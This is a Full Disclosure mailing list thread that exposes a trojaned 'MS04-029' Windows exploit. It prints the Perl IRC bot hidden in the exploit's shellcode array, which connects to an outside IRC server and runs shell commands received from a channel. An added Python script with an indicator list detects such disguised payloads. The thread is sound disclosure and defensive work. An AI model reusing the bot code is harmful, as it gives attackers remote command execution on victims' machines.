Full Disclosure mailing list archives
RE: New Remote Windows Exploit (MS04-029)
From: "Todd Towles" <toddtowles () brookshires com>
Date: Wed, 3 Nov 2004 21:00:47 -0600
Yep, Dave pointed that out really fast...
-----Original Message-----
From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] On Behalf Of Barrie Dempster
Sent: Wednesday, November 03, 2004 3:19 PM
To: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] New Remote Windows Exploit (MS04-029)

Excellent exploit, I'm sure no one will spot that perl IRC bot in there, nope no one will see that...

(hint for the readers, try looking at the ascii output of the "char *shellcode_payload=" data, looks a little like the following....)

[code]
#!/usr/bin/perl $c han="#0x";$nick="k ";$server="ir3ip.n et";$SIG{TERM}={}; exit if fork;use I O::Socket;$sock = IO::Socket::INET-> new($server.":6667 ")||exit;print $so ck "USER k +i k :k v1\nNICK k\n";$i=1 ;while(<$sock>=~/^ [^ ]+ ([^ ]+) /){$ mode=$1;last if $m ode=="001";if($mod e=="433"){$i++;$ni ck=~s/\d*$/$i/;pri nt $sock "NICK $ni ck\n";}}print $soc k "JOIN $chan\nPRI VMSG $chan :Hi\n"; while(<$sock>){if (/^PING (.*)$/){pr int $sock "PONG $1 \nJOIN $chan\n";}i f(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\ w]*:[^ :\w]* (.*)$ /$1/){s/\s*$//;$_= `$_`;foreach(split "\n"){print $sock "PRIVMSG $chan :$ _\n";sleep 1;}}}#/ tmp/hi
[/code]

--
Barrie Dempster (zeedo) - Fortiter et Strenue
http://www.bsrf.org.uk
[ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]
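
The check hinted at above (reading the ASCII of the `char *shellcode_payload=` data before compiling a posted exploit) can be scripted. This is an added example, not part of the original messages; the function names, the indicator list and the inert `HIDDEN` sample are constructed for illustration, and two-digit `\x` escapes are assumed.

```python
import re

# Strings that betray script text inside a "shellcode" array; all of them
# occur in the payload quoted in this thread.
INDICATORS = [b"#!/", b"IO::Socket", b":6667", b"PRIVMSG", b"fork"]
SIMPLE = {"n": 10, "r": 13, "t": 9}
LITERAL = r'"((?:\\.|[^"\\])*)"'
ESCAPE = re.compile(r"\\x([0-9a-fA-F]{1,2})|\\([0-7]{1,3})|\\(.)|([^\\])", re.S)

def decode_c_string(src, name):
    """Return the bytes assigned to `name`, joining adjacent C literals."""
    init = re.search(re.escape(name) + r'\s*(?:\[\s*\])?\s*=\s*((?:"(?:\\.|[^"\\])*"\s*)+);', src)
    if not init:
        raise ValueError("no string initializer found for " + name)
    out = bytearray()
    for lit in re.findall(LITERAL, init.group(1)):
        for hx, oc, ch, plain in ESCAPE.findall(lit):
            if hx:
                out.append(int(hx, 16))
            elif oc:
                out.append(int(oc, 8) & 0xFF)
            elif ch:
                out.append(SIMPLE.get(ch, ord(ch)))
            else:
                out += plain.encode("latin-1")
    return bytes(out)

def triage(payload):
    """Report how text-like the payload is; a high ratio deserves a close read."""
    text = sum(1 for b in payload if 32 <= b < 127 or b in (9, 10, 13))
    return {
        "printable_ratio": text / max(len(payload), 1),
        "strings": re.findall(rb"[\x20-\x7e]{6,}", payload),
        "hits": [i.decode() for i in INDICATORS if i in payload],
    }

def as_c_literal(data, width=16):
    """Encode bytes as adjacent \\xHH C string literals (builds the sample)."""
    rows = [data[i:i + width] for i in range(0, len(data), width)]
    return "\n".join('"' + "".join("\\x%02x" % b for b in r) + '"' for r in rows)

# Constructed, inert stand-in for a disguised script (not the thread's payload).
HIDDEN = b"#!/usr/bin/perl\nuse IO::Socket;\n# placeholder host example.invalid:6667\n"
SAMPLE_C = "char *shellcode_payload=\n" + as_c_literal(HIDDEN) + ";\n"

if __name__ == "__main__":
    report = triage(decode_c_string(SAMPLE_C, "shellcode_payload"))
    print("printable: %.0f%%" % (100 * report["printable_ratio"]))
    print("indicators:", report["hits"], "first string:", report["strings"][0])
```

A payload that decodes to nearly 100% printable text with a shebang or socket library name in it is a script, not native shellcode, and should be read in full before anything is compiled or run.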